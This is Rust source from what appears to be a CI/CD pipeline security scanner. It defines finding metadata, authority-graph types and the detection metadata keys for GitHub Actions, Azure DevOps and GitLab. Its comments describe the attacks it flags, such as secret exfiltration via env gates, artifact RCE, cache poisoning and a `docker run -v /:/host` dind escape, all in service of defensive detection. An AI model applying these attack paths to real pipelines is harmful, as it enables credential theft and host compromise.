    /// place in `nodes_involved` (e.g. ADO `resources.repositories[]`
    /// aliases, GitLab `include:` entries, workflow-level invariants).
    /// When two findings of the same rule fire in the same file, their
    /// anchors must differ for the fingerprints to differ.
    ///
    /// Round-trips through JSON so external tools that recompute
    /// fingerprints from loaded findings get the same value as the
    /// emitting taudit run. `None` (the default) and `Some("")` are the
    /// same equivalence class — both contribute the empty marker to the
    /// canonical string.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub fingerprint_anchor: Option<String>,

    /// Scope of confidence for this finding. Current built-in rules are
    /// `yaml_only`: taudit has proved a static authority shape in the scanned
    /// YAML artifact, but runtime/provider settings may still affect
    /// exploitability.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub confidence_scope: Option<String>,

    /// Human-readable runtime or control-plane assumptions that must be
    /// verified before treating the static finding as live exploitability.
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub runtime_preconditions: Vec<String>,

    /// True when exploitability materially depends on provider-side controls
    /// not represented in the YAML artifact, such as Azure DevOps service
    /// connection authorization or GitHub repository settings. Omitted from
    /// serialized output while `false`.
    #[serde(default, skip_serializing_if = "is_false")]
    pub portal_control_dependency: bool,

    /// Coarse authority kinds involved in the finding: e.g. `job_token`,
    /// `oidc_identity`, `service_connection`, `variable_group`,
    /// `credential_named_variable`, `artifact`, or `image`.
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub authority_kinds: Vec<String>,

    /// Coarse attacker-influenced surfaces involved in the finding: e.g.
    /// `untrusted_checkout`, `script_sink`, `mutable_dependency_ref`,
    /// `reusable_workflow_boundary`, or `self_hosted_runner`.
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub attacker_surface_kinds: Vec<String>,

    /// Template/reusable-workflow resolution strength for delegation findings:
    /// `resolved`, `partial`, `opaque`, or `not_applicable`.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub template_resolution_strength: Option<String>,

    /// Relationship between this finding and any cited CVE/advisory:
    /// `same_primitive`, `same_authority_shape`, `analogue_only`, or
    /// `not_applicable`.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub cve_relationship: Option<String>,
}
693
694impl FindingExtras {
695    /// Convenience constructor for the common case of "default extras
696    /// plus a per-finding fingerprint anchor". Used by rules whose
697    /// emission sites have no natural graph-node anchor and need the
698    /// anchor to discriminate multiple findings of the same rule in one
699    /// file (see `compute_fingerprint` v3 contract).
700    pub fn with_anchor(anchor: impl Into<String>) -> Self {
701        Self {
702            fingerprint_anchor: Some(anchor.into()),
703            ..Self::default()
704        }
705    }
706
707    /// Convenience constructor for report-facing metadata that is not a
708    /// fingerprint anchor. Keeps rule call sites additive rather than forcing
709    /// every built-in rule to hand-populate publication context.
710    pub fn with_confidence_scope(scope: impl Into<String>) -> Self {
711        Self {
712            confidence_scope: Some(scope.into()),
713            ..Self::default()
714        }
715    }
716}
717
/// Serde `skip_serializing_if` predicate: returns `true` when the flag is
/// `false`, so unset boolean fields are left out of the serialized output.
// The predicate is invoked with a reference to the field, so the parameter
// has to be `&bool` even though `bool` is `Copy` — hence the lint allowance.
#[allow(clippy::trivially_copy_pass_by_ref)]
fn is_false(flag: &bool) -> bool {
    !flag
}
722
/// A finding is a concrete, actionable authority issue.
///
/// The fields of [`FindingExtras`] are flattened into the same serialized
/// object, so on the wire they sit beside `severity`, `message`, etc.
#[allow(missing_docs)]
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Finding {
    // Current severity. May already be downgraded from the rule-emitted
    // value; `extras.original_severity` records the pre-downgrade value
    // when that has happened.
    pub severity: Severity,
    // Category of the finding.
    pub category: FindingCategory,
    // Propagation path attached to the finding, if any. Left out of the
    // serialized output when `None`.
    #[serde(skip_serializing_if = "Option::is_none")]
    pub path: Option<PropagationPath>,
    // Graph nodes this finding refers to. `NodeId` values are only
    // meaningful within the graph emission that produced them.
    pub nodes_involved: Vec<NodeId>,
    // Message text of the finding.
    pub message: String,
    // Remediation recommended for the finding.
    pub recommendation: Recommendation,
    /// Provenance of this finding. Defaults to `BuiltIn` for backward
    /// compatibility with code/JSON that predates the field — every
    /// in-tree built-in rule sets this explicitly. Deserialization of older
    /// JSON without the field treats the finding as built-in.
    #[serde(default)]
    pub source: FindingSource,
    /// Optional metadata (group id, time-to-fix, compensating controls,
    /// suppression markers). Flattens into the JSON object so consumers
    /// see top-level fields — see `FindingExtras` for individual semantics.
    #[serde(flatten, default)]
    pub extras: FindingExtras,
}
746
747impl Finding {
748    /// Builder helper: attach a `time_to_fix` annotation to this finding.
749    /// Call sites: `let f = Finding { ... }.with_time_to_fix(FixEffort::Trivial);`
750    pub fn with_time_to_fix(mut self, effort: FixEffort) -> Self {
751        self.extras.time_to_fix = Some(effort);
752        self
753    }
754
755    /// Builder helper: append a compensating control description and
756    /// downgrade severity by one tier (Critical -> High -> Medium -> Low -> Info).
757    /// Records the original severity so the audit trail survives.
758    pub fn with_compensating_control(mut self, control: impl Into<String>) -> Self {
759        let original = self.severity;
760        self.extras.compensating_controls.push(control.into());
761        self.severity = downgrade_severity(self.severity);
762        if self.extras.original_severity.is_none() {
763            self.extras.original_severity = Some(original);
764        }
765        self
766    }
767}
768
769// ── Graph types: NodeId / EdgeId aliases ─────────────────────────
770
/// Unique identifier for a node in the authority graph.
///
/// **Stability contract.** `NodeId` values are dense indices stable within a
/// single scan / graph emission (`taudit graph --format json`). They are
/// **not** stable across separate scans — two runs against the same input
/// pipeline can renumber nodes if the parser visits them in a different
/// order. Downstream consumers that need cross-run identity should key on
/// the finding `fingerprint` (in JSON / SARIF / CloudEvents output) rather
/// than `NodeId`. See `docs/finding-fingerprint.md`.
///
/// This is a plain alias for `usize`, not a distinct type, so the compiler
/// will not catch a `NodeId` being passed where an [`EdgeId`] is expected.
pub type NodeId = usize;
781
/// Unique identifier for an edge in the authority graph.
///
/// **Stability contract.** Same caveat as [`NodeId`] — dense indices stable
/// within one emitted graph, NOT stable across runs. Use fingerprints for
/// cross-run identity.
///
/// Like [`NodeId`], this is a plain alias for `usize`.
pub type EdgeId = usize;
788
789// ── Metadata key constants ───────────────────────────────────────
790// Avoids stringly-typed bugs across crate boundaries.
791//
792// Every constant below is a key string that downstream consumers may read
793// from `Node.metadata` or `AuthorityGraph.metadata` in emitted JSON.
794
/// Records the digest of a pinned action / image reference.
pub const META_DIGEST: &str = "digest";
/// Records the `permissions:` block scoped to an Identity / Step node.
pub const META_PERMISSIONS: &str = "permissions";
/// Records the inferred breadth of an identity's scope (`broad` / `constrained` / `unknown`).
pub const META_IDENTITY_SCOPE: &str = "identity_scope";
/// Marks a metadata value that the parser inferred rather than read literally.
pub const META_INFERRED: &str = "inferred";
/// Marks an Image node as a job container (not a `uses:` action).
pub const META_CONTAINER: &str = "container";
/// Marks an Identity node as OIDC-capable (`permissions: id-token: write`).
pub const META_OIDC: &str = "oidc";
/// Marks a Secret node whose value is interpolated into a CLI flag argument (e.g. `-var "key=$(SECRET)"`).
/// CLI flag values appear in pipeline log output even when ADO secret masking is active,
/// because the command string is logged before masking runs and Terraform itself logs `-var` values.
pub const META_CLI_FLAG_EXPOSED: &str = "cli_flag_exposed";
/// Graph-level metadata: identifies the trigger type (e.g. `pull_request_target`, `pr`).
/// See [`META_TRIGGERS`] for the comma-joined list of every declared trigger.
pub const META_TRIGGER: &str = "trigger";
/// Marks a Step that writes to the environment gate (`$GITHUB_ENV`, ADO `##vso[task.setvariable]`).
pub const META_WRITES_ENV_GATE: &str = "writes_env_gate";
/// Marks a Step that writes a `$(secretRef)` value to the env gate. Co-set with
/// [`META_WRITES_ENV_GATE`] when the written VALUE contains an ADO `$(VAR)` expression,
/// distinguishing secret-exfiltration from plain-integer or literal env-gate writes.
pub const META_ENV_GATE_WRITES_SECRET_VALUE: &str = "env_gate_writes_secret_value";
/// Marks a Step that came from an ADO `##vso[task.setvariable]` call (as opposed to
/// a GHA `>> $GITHUB_ENV` redirect). Used to distinguish the two env-gate write
/// patterns so BUG-4 suppression only applies to ADO plain-value writes.
pub const META_SETVARIABLE_ADO: &str = "setvariable_ado";
/// Marks a Step that reads from the runner-managed environment via an
/// `env.<NAME>` template reference — `${{ env.X }}` in a `with:` value,
/// inline script body, or step `env:` mapping. Distinct from `secrets.X`
/// references (which produce a HasAccessTo edge to a Secret node) — `env.X`
/// references can be sourced from the ambient runner environment, including
/// values laundered through `$GITHUB_ENV` by an earlier step. Stamped by
/// the GHA parser so `secret_via_env_gate_to_untrusted_consumer` can find
/// the gate-laundering chain that the explicit-secret rules miss.
pub const META_READS_ENV: &str = "reads_env";
/// Marks a Step that performs cryptographic provenance attestation (e.g. `actions/attest-build-provenance`).
pub const META_ATTESTS: &str = "attests";
/// Marks a Secret node sourced from an ADO variable group (vs inline pipeline variable).
pub const META_VARIABLE_GROUP: &str = "variable_group";
/// Marks an Image node as a self-hosted agent pool (pool.name on ADO; runs-on: self-hosted on GHA).
pub const META_SELF_HOSTED: &str = "self_hosted";
/// Marks a Step that performs a `checkout: self` (ADO) or default `actions/checkout` on a PR context.
pub const META_CHECKOUT_SELF: &str = "checkout_self";
/// Marks an Identity node as an ADO service connection.
pub const META_SERVICE_CONNECTION: &str = "service_connection";
/// Marks an Identity node as implicitly injected by the platform (e.g. ADO System.AccessToken).
/// Implicit tokens are structurally accessible to all tasks by platform design — exposure
/// to untrusted steps is Info-level (structural) rather than Critical (misconfiguration).
pub const META_IMPLICIT: &str = "implicit";
/// Marks a Step that belongs to an ADO deployment job whose `environment:` is
/// configured with required approvals — a manual gate that breaks automatic
/// authority propagation. Findings whose path crosses such a node have their
/// severity reduced by one step (Critical → High → Medium → Low).
pub const META_ENV_APPROVAL: &str = "env_approval";
/// Records the parent job name on every Step node, enabling per-job subgraph
/// filtering (e.g. `taudit map --job build`) and downstream consumers that
/// need to attribute steps back to their containing job. Set by both the GHA
/// and ADO parsers on every Step they create within a job's scope.
pub const META_JOB_NAME: &str = "job_name";
/// Step-level metadata: normalized GitHub Actions `uses:` action name without
/// its `@ref` suffix, for example `docker/login-action`. Set only by the GHA
/// parser on `uses:` steps.
pub const META_GHA_ACTION: &str = "gha_action";
/// Step-level metadata: sorted scalar `with:` inputs for a GHA `uses:` step,
/// encoded as newline-delimited `key=value` records. Non-scalar inputs are
/// omitted. Consumed by action-specific rules that need precision controls
/// such as `mask-password: false` or `skip_install: true`.
pub const META_GHA_WITH_INPUTS: &str = "gha_with_inputs";
/// Graph-level metadata: JSON-encoded array of `resources.repositories[]`
/// entries declared by the pipeline. Each entry is an object with fields
/// `alias`, `repo_type`, `name`, optional `ref`, and `used` (true when the
/// alias is referenced via `template: x@alias`, `extends: x@alias`, or
/// `checkout: alias` somewhere in the same pipeline file). Set by the ADO
/// parser; consumed by `template_extends_unpinned_branch`.
pub const META_REPOSITORIES: &str = "repositories";
/// Records the raw inline script body of a Step (the text from
/// `script:` / `bash:` / `powershell:` / `pwsh:` / `run:` / task
/// `inputs.script` / `inputs.Inline` / `inputs.inlineScript`). Stamped by
/// parsers when the step has an inline script. Consumed by script-aware
/// rules: `vm_remote_exec_via_pipeline_secret`,
/// `short_lived_sas_in_command_line`, `secret_to_inline_script_env_export`,
/// `secret_materialised_to_workspace_file`, `keyvault_secret_to_plaintext`,
/// `add_spn_with_inline_script`, `parameter_interpolation_into_shell`.
/// Stored verbatim — rules apply their own pattern matching.
pub const META_SCRIPT_BODY: &str = "script_body";
/// Records the name of the ADO service connection a step uses (the value of
/// `inputs.azureSubscription` / `inputs.connectedServiceName*`). Set on the
/// Step node itself (in addition to the Identity node it links to) so rules
/// can pattern-match on the connection name without traversing edges.
/// The Identity node itself is marked with [`META_SERVICE_CONNECTION`].
pub const META_SERVICE_CONNECTION_NAME: &str = "service_connection_name";
/// Marks a Step as performing `terraform apply ... -auto-approve` (either via
/// an inline script or via a `TerraformCLI` / `TerraformTask` task with
/// `command: apply` and `commandOptions` containing `auto-approve`).
pub const META_TERRAFORM_AUTO_APPROVE: &str = "terraform_auto_approve";
/// Marks a Step task that runs with `addSpnToEnvironment: true`, exposing
/// the federated SPN (idToken / servicePrincipalKey / servicePrincipalId /
/// tenantId) to the inline script body via environment variables.
pub const META_ADD_SPN_TO_ENV: &str = "add_spn_to_environment";
/// Graph-level metadata: identifies the source platform of the parsed
/// pipeline. Set by every parser to its `platform()` value
/// (`"github-actions"`, `"azure-devops"`, `"gitlab"`). Allows platform-scoped
/// rules to gate their detection without parsing the source file path.
pub const META_PLATFORM: &str = "platform";
/// Graph-level metadata: marks a GitHub Actions workflow as having NO
/// top-level `permissions:` block declared. Set by the GHA parser when
/// `workflow.permissions` is absent so rules can detect the negative-space
/// "no permissions block at all" pattern (which leaves `GITHUB_TOKEN` at its
/// broad platform default — `contents: write`, `packages: write`, etc.).
pub const META_NO_WORKFLOW_PERMISSIONS: &str = "no_workflow_permissions";
/// Marks a Step in a GHA workflow as carrying an `if:` condition that
/// references the standard fork-check pattern
/// (`github.event.pull_request.head.repo.fork == false` or the equivalent
/// `head.repo.full_name == github.repository`). Stamped by the GHA parser so
/// rules can credit the step with the compensating control without
/// re-parsing the YAML expression. Bool stored as `"true"`.
pub const META_FORK_CHECK: &str = "fork_check";
/// Marks a GitLab CI job (Step node) whose `rules:` or `only:` clause
/// restricts execution to protected branches — either via an explicit
/// `if: $CI_COMMIT_REF_PROTECTED == "true"` rule, an `if: $CI_COMMIT_BRANCH
/// == $CI_DEFAULT_BRANCH` rule, or an `only: [main, ...]` allowlist of
/// platform-protected refs. Set by the GitLab parser. Absence on a
/// deployment job is a control gap.
pub const META_RULES_PROTECTED_ONLY: &str = "rules_protected_only";
/// Graph-level metadata: comma-joined list of every entry under `on:` (e.g.
/// `pull_request_target,issue_comment,workflow_run`). Distinct from
/// [`META_TRIGGER`] (singular) which is set only for `pull_request_target` /
/// ADO `pr` to preserve the existing `trigger_context_mismatch` contract.
/// Consumers of this list (e.g. `risky_trigger_with_authority`) must split on
/// `,` and treat each token as a trigger name.
pub const META_TRIGGERS: &str = "triggers";
/// Graph-level metadata: comma-joined list of `workflow_dispatch.inputs.*`
/// names declared by the workflow. Empty / absent if the workflow has no
/// `workflow_dispatch` trigger. Consumed by
/// `manual_dispatch_input_to_url_or_command` to taint-track input flow into
/// command lines, URLs, and `actions/checkout` refs.
pub const META_DISPATCH_INPUTS: &str = "dispatch_inputs";
/// Graph-level metadata: pipe-delimited list of `<job>\t<name>\t<source>`
/// records, one per `jobs.<id>.outputs.<name>`. Records are joined with `|`,
/// fields within a record with `\t`. `source` is one of `secret` (value
/// reads `secrets.*`), `oidc` (value references `steps.*.outputs.*` from a
/// step that holds an OIDC identity), `step_output` (any other
/// `steps.*.outputs.*`), or `literal`. Plain-text rather than JSON to keep
/// the parser crate free of `serde_json`. Consumed by
/// `sensitive_value_in_job_output`.
pub const META_JOB_OUTPUTS: &str = "job_outputs";
/// Step-level metadata: the value passed to `actions/checkout`'s `with.ref`
/// input (verbatim, including any `${{ … }}` expressions). Stamped only on
/// `actions/checkout` steps that supply a `ref:`. Consumed by
/// `manual_dispatch_input_to_url_or_command`.
pub const META_CHECKOUT_REF: &str = "checkout_ref";
/// Marks the synthetic Step node created for a job that delegates to a
/// reusable workflow with `secrets: inherit`. The whole secret bag forwards
/// to the callee regardless of what the callee actually consumes — when the
/// caller is fired by an attacker-controllable trigger this is a wide-open
/// exfiltration path. Set on the synthetic step node by the GHA parser.
pub const META_SECRETS_INHERIT: &str = "secrets_inherit";
/// Marks a Step that downloads a workflow artifact (typically
/// `actions/download-artifact` or `dawidd6/action-download-artifact`).
/// In `workflow_run`-triggered consumers, the originating run's artifacts
/// were produced from PR context — the consumer must treat their content as
/// untrusted input even when the consumer itself runs with elevated perms.
pub const META_DOWNLOADS_ARTIFACT: &str = "downloads_artifact";
/// Marks a Step whose body interprets artifact (or other untrusted file)
/// content into a privileged sink — `unzip`/`tar -x`, `cat`/`jq` piping
/// into `>> $GITHUB_ENV`/`>> $GITHUB_OUTPUT`, `eval`, posting to a PR
/// comment via `actions/github-script` `body:`/`issue_body:`, or evaluating
/// extracted text. Combined with [`META_DOWNLOADS_ARTIFACT`] upstream in the
/// same job and a `workflow_run`/`pull_request_target` trigger this is the
/// classic mypy_primer / coverage-comment artifact-RCE pattern.
pub const META_INTERPRETS_ARTIFACT: &str = "interprets_artifact";
/// Marks a Step that uses an interactive debug action (mxschmitt/action-tmate,
/// lhotari/action-upterm, actions/tmate, etc.). The metadata value is the
/// action reference (e.g. `mxschmitt/action-tmate@v3`). A successful debug
/// session gives the operator an external SSH endpoint with the runner's full
/// environment loaded — every secret in scope, the checked-out HEAD, and
/// write access to whatever the GITHUB_TOKEN holds.
pub const META_INTERACTIVE_DEBUG: &str = "interactive_debug";
/// Marks a Step that calls `actions/cache` (or `actions/cache/save` /
/// `actions/cache/restore`). The metadata value is the raw `key:` input from
/// the step's `with:` block. Consumed by `pr_specific_cache_key_in_default_branch_consumer`
/// to detect PR-derived cache keys (head_ref, head.ref, actor) that a
/// default-branch run can later restore — classic cache poisoning.
pub const META_CACHE_KEY: &str = "cache_key";
/// Records the OIDC audience (`aud:`) value of an `id_tokens:` entry on an
/// Identity node. GitLab CI emits one Identity per `id_tokens:` key; the
/// audience is what trades for downstream cloud creds (Vault path, AWS role,
/// etc), so audience reuse across MR-context and protected-context jobs is
/// the precise privilege-overscope signal. Set by the GitLab parser.
pub const META_OIDC_AUDIENCE: &str = "oidc_audience";
/// Records the comma-joined list of `id_tokens.aud:` values when GitLab CI
/// declares the audience as a YAML sequence (multi-cloud broker — strongest
/// over-scoping signal). When set, the legacy [`META_OIDC_AUDIENCE`] field
/// holds the same comma-joined string for backward compatibility, and this
/// field is the explicit "this was a list" marker. Set by the GitLab parser
/// only on the multi-aud path; absent for scalar `aud:` values.
pub const META_OIDC_AUDIENCES: &str = "oidc_audiences";
/// Records a Step's `environment:url:` value verbatim. Stamped by the GitLab
/// parser when the job declares an `environment:` mapping with a `url:`
/// field. Consumed by `untrusted_ci_var_in_shell_interpolation` because
/// `environment:url:` is rendered by the GitLab UI and any predefined-CI-var
/// interpolated into it is a stored-XSS / open-redirect sink.
pub const META_ENVIRONMENT_URL: &str = "environment_url";
/// Graph-level metadata: JSON-encoded array of `include:` entries declared by
/// a GitLab CI pipeline. Each entry is an object with fields:
/// - `kind`: one of `local`, `remote`, `template`, `project`, `component`
/// - `target`: the path/URL/project string
/// - `git_ref`: the resolved `ref:` value (only meaningful for `project` and
///   `remote`) — empty string when the include omits a `ref:`
///
/// Set by the GitLab parser; consumed by `unpinned_include_remote_or_branch_ref`.
pub const META_GITLAB_INCLUDES: &str = "gitlab_includes";
/// Marks a Step (GitLab job) that declares one or more `services:` entries
/// matching `docker:*-dind` or `docker:dind`. Combined with secret-bearing
/// HasAccessTo edges it indicates a runtime sandbox-escape primitive — any
/// inline build step can `docker run -v /:/host` from inside dind.
pub const META_GITLAB_DIND_SERVICE: &str = "gitlab_dind_service";
/// Marks a Step (GitLab job) declared with `allow_failure: true`. Used by
/// `security_job_silently_skipped` to detect scanner jobs that pass silently.
pub const META_GITLAB_ALLOW_FAILURE: &str = "gitlab_allow_failure";
/// Records the comma-joined list of `extends:` template names a GitLab job
/// inherits from. Used by scanner-name pattern matching in
/// `security_job_silently_skipped` because GitLab security templates are
/// usually consumed via `extends:` rather than by job-name match.
pub const META_GITLAB_EXTENDS: &str = "gitlab_extends";
/// Marks a Step (GitLab job) that defines a `trigger:` block (downstream /
/// child pipeline). Value is `"static"` for a fixed downstream `project:` or
/// `include:` of in-tree YAML, and `"dynamic"` when the include source is an
/// `artifact:` (dynamic child pipelines — code-injection sink).
pub const META_GITLAB_TRIGGER_KIND: &str = "gitlab_trigger_kind";
/// Records the literal `cache.key:` value declared on a GitLab job (or the
/// empty string if no cache is declared). Consumed by
/// `cache_key_crosses_trust_boundary` to detect cross-trust cache keys.
pub const META_GITLAB_CACHE_KEY: &str = "gitlab_cache_key";
/// Records the `cache.policy:` value declared on a GitLab job
/// (`pull` / `push` / `pull-push` / `pull_push`). When absent, the GitLab
/// runtime default is `pull-push`. Consumed by
/// `cache_key_crosses_trust_boundary`.
pub const META_GITLAB_CACHE_POLICY: &str = "gitlab_cache_policy";
/// Records the deployment environment name on a Step
/// (e.g. GitLab `environment.name:` / GHA `environment:`).
/// Used by rules that gate on production-like environment names.
pub const META_ENVIRONMENT_NAME: &str = "environment_name";
/// Records the GitLab `artifacts.reports.dotenv:` file path for a Step.
/// When set, the file's `KEY=value` lines are silently exported as
/// pipeline variables for every downstream job that consumes this job
/// via `needs:` or `dependencies:`. Consumed by
/// `dotenv_artifact_flows_to_privileged_deployment`.
pub const META_DOTENV_FILE: &str = "dotenv_file";
/// Records, on a Step, the upstream job names this step consumes via
/// GitLab `needs:` or `dependencies:`. Comma-separated job names.
/// Used to build dotenv-flow dependency chains across stages
/// (see [`META_DOTENV_FILE`]).
pub const META_NEEDS: &str = "needs";
/// Marks an Image node (self-hosted agent pool) as having workspace isolation
/// configured (`workspace: { clean: all }` or `workspace: { clean: true }` in
/// ADO). When present, the agent workspace is wiped between runs, mitigating
/// workspace poisoning attacks where a PR build leaves malicious files for the
/// next privileged pipeline run. Absence of this key on a self-hosted Image
/// node (see [`META_SELF_HOSTED`]) is the signal for
/// `shared_self_hosted_pool_no_isolation`.
pub const META_WORKSPACE_CLEAN: &str = "workspace_clean";
/// Step-level metadata: the AND-joined chain of `condition:` expressions that
/// gate this step's runtime execution (stage condition, then job condition,
/// then step condition, joined with ` AND `). Stamped by parsers that surface
/// runtime gating expressions — currently the ADO parser (stage / job / step
/// `condition:`). Presence of this key means the step is NOT unconditionally
/// reachable on every trigger; the runtime evaluator decides via expression
/// (e.g. `eq(variables['Build.SourceBranch'], 'refs/heads/main')`). Consumed
/// by `apply_compensating_controls` to downgrade severity on findings whose
/// firing step is gated behind a conditional.
pub const META_CONDITION: &str = "condition";
/// Step-level metadata: comma-joined list of upstream stage / job names this
/// step's container declared via a non-default `dependsOn:` value. Default ADO
/// behaviour ("depends on the previous job/stage") is NOT stamped — only
/// explicit overrides. Currently a parser-side hook for future cross-job
/// taint rules; no consumer rule exists yet.
pub const META_DEPENDS_ON: &str = "depends_on";
1072
1073// ── Shared serde helpers ─────────────────────────────────────────
1074
1075/// Serialize a `HashMap<String, V>` with keys in sorted order. The
1076/// in-memory representation stays a `HashMap` (cheaper insertion, hot
1077/// path on every parser); only the serialized form is canonicalised.
1078/// This is the single point of determinism control for graph metadata
1079/// emitted via JSON / SARIF / CloudEvents — without it, HashMap iteration
1080/// order leaks per-process randomness into every diff and cache key.
1081///
1082/// Public so the engine crate (`taudit-core`) can apply the same
1083/// canonical ordering to its `AuthorityGraph` HashMap fields.
1084#[doc(hidden)]
1085pub fn serialize_string_map_sorted<S, V>(
1086    map: &HashMap<String, V>,
1087    serializer: S,
1088) -> Result<S::Ok, S::Error>
1089where
1090    S: Serializer,
1091    V: Serialize,
1092{
1093    let sorted: BTreeMap<&String, &V> = map.iter().collect();
1094    sorted.serialize(serializer)
1095}
1096
1097// ── Graph-level precision markers ────────────────────────────────
1098
/// The category of reason why a graph is partial.
///
/// Serialized in `snake_case`: `expression`, `structural`, `opaque`.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
#[serde(rename_all = "snake_case")]
pub enum GapKind {
    /// A template or matrix expression hides a value; graph structure is intact.
    Expression,
    /// An unresolvable component (composite action, reusable workflow, extends,
    /// include) breaks the authority chain.
    Structural,
    /// The graph cannot be built at all (zero steps produced, unknown platform).
    Opaque,
}
1111
/// How complete is this authority graph? Parsers set this based on whether
/// they could fully resolve all authority relationships in the pipeline YAML.
///
/// A `Partial` graph is still useful — it just tells the consumer that some
/// authority paths may be missing. This is better than silent incompleteness.
///
/// Serialized in `snake_case`: `complete`, `partial`, `unknown`.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
#[serde(rename_all = "snake_case")]
pub enum AuthorityCompleteness {
    /// Parser resolved all authority relationships.
    Complete,
    /// Parser found constructs it couldn't fully resolve (e.g. secrets in
    /// shell strings, composite actions, reusable workflows). The graph
    /// captures what it can, but edges may be missing.
    Partial,
    /// Parser couldn't determine completeness.
    Unknown,
}
1129
/// How broad is an identity's scope? Classifies the risk surface of tokens,
/// service principals, and OIDC identities.
///
/// Serialized in `snake_case`: `broad`, `constrained`, `unknown`. Use
/// [`IdentityScope::from_permissions`] to derive a value from a permissions
/// string.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
#[serde(rename_all = "snake_case")]
pub enum IdentityScope {
    /// Wide permissions: write-all, admin, or unscoped tokens.
    Broad,
    /// Narrow permissions: contents:read, specific scopes.
    Constrained,
    /// Scope couldn't be determined — treat as risky.
    Unknown,
}
1142
1143impl IdentityScope {
1144    /// Classify an identity scope from a permissions string.
1145    pub fn from_permissions(perms: &str) -> Self {
1146        let p = perms.to_lowercase();
1147        if p.contains("write-all") || p.contains("admin") || p == "{}" || p.is_empty() {
1148            IdentityScope::Broad
1149        } else if p.contains("write") {
1150            // Any write permission = broad (conservative)
1151            IdentityScope::Broad
1152        } else if p.contains("read") {
1153            IdentityScope::Constrained
1154        } else {
1155            IdentityScope::Unknown
1156        }
1157    }
1158}
1159
1160// ── Node types ───────────────────────────────────────────────────
1161
/// Semantic kind of a graph node.
///
/// Serialized in `snake_case`: `step`, `secret`, `artifact`, `identity`,
/// `image`. See [`EdgeKind`] for which kinds each edge connects.
#[allow(missing_docs)]
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
#[serde(rename_all = "snake_case")]
pub enum NodeKind {
    /// A pipeline step; per the [`EdgeKind`] docs, the origin of
    /// `has_access_to`, `produces`, `uses_image`, `delegates_to` and
    /// `persists_to` edges.
    Step,
    /// A secret; one of the two authority origins of a [`PropagationPath`].
    Secret,
    /// An artifact: target of `produces` edges and origin of `consumes` edges.
    Artifact,
    /// An identity such as a token, service principal, or OIDC identity
    /// (see [`IdentityScope`]); the other authority origin of a
    /// [`PropagationPath`].
    Identity,
    /// An image or action that a step delegates execution to; also used for
    /// self-hosted agent pools (see [`META_WORKSPACE_CLEAN`]).
    Image,
}
1173
/// Trust classification. Explicit on every node — not inferred from kind.
///
/// Serialized in `snake_case`: `first_party`, `third_party`, `untrusted`.
/// For comparisons, [`TrustZone::is_lower_than`] orders the zones
/// `Untrusted` < `ThirdParty` < `FirstParty`.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
#[serde(rename_all = "snake_case")]
pub enum TrustZone {
    /// Code/config authored by the repo owner.
    FirstParty,
    /// Marketplace actions, external images (pinned).
    ThirdParty,
    /// Unpinned actions, fork PRs, user input.
    Untrusted,
}
1185
1186impl TrustZone {
1187    /// Returns true if `self` is a lower trust level than `other`.
1188    pub fn is_lower_than(&self, other: &TrustZone) -> bool {
1189        self.rank() < other.rank()
1190    }
1191
1192    fn rank(&self) -> u8 {
1193        match self {
1194            TrustZone::FirstParty => 2,
1195            TrustZone::ThirdParty => 1,
1196            TrustZone::Untrusted => 0,
1197        }
1198    }
1199}
1200
/// A node in the authority graph.
#[allow(missing_docs)]
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Node {
    /// Identifier of this node; `Edge::from` / `Edge::to` and
    /// `PropagationPath::source` / `PropagationPath::sink` refer to nodes by
    /// this id type.
    pub id: NodeId,
    /// Semantic kind of the node.
    pub kind: NodeKind,
    /// Name of the node.
    pub name: String,
    /// Trust classification, stored explicitly rather than inferred from `kind`.
    pub trust_zone: TrustZone,
    /// Flexible metadata: pinning status, digest, scope, permissions, etc.
    /// Serialized in sorted-key order so JSON / SARIF / CloudEvents output
    /// is byte-deterministic across runs (HashMap iteration is randomised
    /// per process, which would otherwise break diffs and cache keys).
    #[serde(serialize_with = "serialize_string_map_sorted")]
    pub metadata: HashMap<String, String>,
}
1216
1217// ── Edge types ───────────────────────────────────────────────────
1218
/// Edge semantics model authority/data flow — not syntactic YAML relations.
/// Design test: "Can authority propagate along this edge?"
///
/// Serialized in `snake_case` (e.g. `has_access_to`, `persists_to`). The
/// derived `PartialOrd` / `Ord` follow variant declaration order, so
/// reordering variants changes how values compare and sort.
#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord, Hash, Serialize, Deserialize)]
#[serde(rename_all = "snake_case")]
pub enum EdgeKind {
    /// Step -> Secret or Identity (authority granted at runtime).
    HasAccessTo,
    /// Step -> Artifact (data flows out).
    Produces,
    /// Artifact -> Step (authority flows from artifact to consuming step).
    Consumes,
    /// Step -> Image/Action (execution delegation).
    UsesImage,
    /// Step -> Step (cross-job or action boundary).
    DelegatesTo,
    /// Step -> Secret or Identity (credential written to disk, outliving the step's lifetime).
    /// Distinct from HasAccessTo: disk persistence is accessible to all subsequent steps
    /// and processes with filesystem access, not just the step that created it.
    PersistsTo,
}
1239
/// Abbreviated authority context for **`HasAccessTo` → identity** edges in
/// JSON exports (ADR 0002 Phase 2). Copied from the target identity's trust
/// zone and selected `metadata` keys so consumers need not reverse-engineer
/// raw `META_*` strings for common questions. Omitted on edges where absent.
///
/// Every field is optional: a `None` field is left out of the serialized
/// object, and a missing field deserializes to `None`.
#[derive(Debug, Clone, Default, PartialEq, Eq, Serialize, Deserialize)]
pub struct AuthorityEdgeSummary {
    /// Target identity trust zone (`first_party` / `third_party` / `untrusted`).
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub trust_zone: Option<String>,
    /// Copy of `identity_scope` metadata when present.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub identity_scope: Option<String>,
    /// Copy of `permissions` metadata when present, truncated for bounded JSON.
